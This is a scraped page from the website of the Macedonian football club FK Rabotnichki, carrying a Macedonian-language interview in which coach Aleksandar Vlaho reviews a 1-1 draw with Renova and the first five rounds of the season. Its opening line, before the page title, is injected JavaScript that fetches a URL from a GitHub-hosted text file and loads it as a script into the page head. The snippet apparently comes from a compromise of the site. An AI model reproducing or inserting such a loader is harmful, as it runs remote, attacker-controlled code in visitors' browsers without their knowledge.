;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Влахо: Работнички можеше да има уште бод или два по петте кола
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Влахо: Работнички можеше да има уште бод или два по петте кола

Работнички ремизираше (1-1) против Ренова во Тетово и првите пет кола од шампионатот ги заокружи со осум освоени бода. Тренерот Александар Влахо е задоволен од прикажаната игра на последниот меч.

„Морам да изразам задоволство, одигравме квалитетно против Ренова, која одлична ја почна сезоната. Знаевме дека ќе биде тежок натпревар против ривал кој сака да се надигрува, предводен од искусен стратег кого многу го почитувам. Дозволивме да примиме гол по една наша грешка, но потоа одлично реагиравме, возвративме со голот од пенал на Марио Станковски кој го одигра најдобриот меч од почетокот на сезоната. Што се однесува до првите пет кола во целина, мислам дека Работнички можеше да има уште бод или два повеќе. Искрено, според тоа што го одигравме, мислам дека не заслуживме пораз против Академија Пандев во Струмица. Но, сега треба добро да ја искористиме паузата и да се подготвиме за новите искушенија“, вели шефот на стручниот штаб, Александар Влахо.

Работнички в сабота ќе одигра пријателски натпревар против второлигашот Кадино.